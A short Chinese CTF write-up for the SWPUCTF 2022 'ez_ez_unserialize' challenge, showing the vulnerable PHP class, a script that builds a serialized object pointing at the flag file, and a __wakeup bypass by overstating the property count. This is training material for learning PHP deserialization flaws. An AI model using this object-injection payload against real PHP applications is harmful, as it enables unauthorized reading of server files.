复健第二天之[SWPUCTF 2022 新生赛]ez_ez_unserialize

打开题目在线环境直接看到源码:

php 复制代码
<?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}

审计这些php代码,是反序列化,然后根据这个构造pop链:

php 复制代码
<?php

class X
{
    public $x = 'fllllllag.php';
}

$a = new X;
echo serialize($a);

?>

输出 的反序列化数据为:

*O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

这里绕过weakup,修改 "X" 后的 1(成员属性数量) 大于 1(实际数量) 即可。

最后再用GET或者POST 方法传参得到flag。

相关推荐
瘾大侠29 分钟前
HTB 赛季10 - Pterodactyl - user
网络·安全·web安全·网络安全
Ancelin安心15 小时前
FastJson反序列化和Shiro漏洞
java·运维·开发语言·安全·web安全·json·idea
少云清1 天前
【安全测试】3_网络安全测试 _数据加密和数据签名
安全·web安全
独行soc1 天前
2026年渗透测试面试题总结-23(题目+回答)
网络·python·安全·web安全·渗透测试·安全狮
Jerry_Gao9211 天前
【CTF】一道非常精彩的CTF题目之 SSRF + CRLF + Python反序列化组合漏洞利用
python·web安全·网络安全·ctf·ssrf·crlf
网安老伯1 天前
2026 网络安全就业:普通人抓住年薪百万入场券的实操指南
运维·python·学习·web安全·网络安全·职场和发展·php
白帽子凯哥哥2 天前
2026“星城白帽”冬令营:三天实战淬炼,守护数字未来!
web安全·网络安全·渗透测试·湖南省网安基地·冬令营
烤麻辣烫2 天前
网络安全-2-win系统的常用命令及相关概念
运维·学习·安全·web安全·网络安全
数字护盾(和中)2 天前
IPv6 + 技术演进 开启智慧城市发展全新篇章
运维·网络·安全·web安全
独行soc2 天前
2026年渗透测试面试题总结-22(题目+回答)
网络·python·安全·web安全·渗透测试·安全狮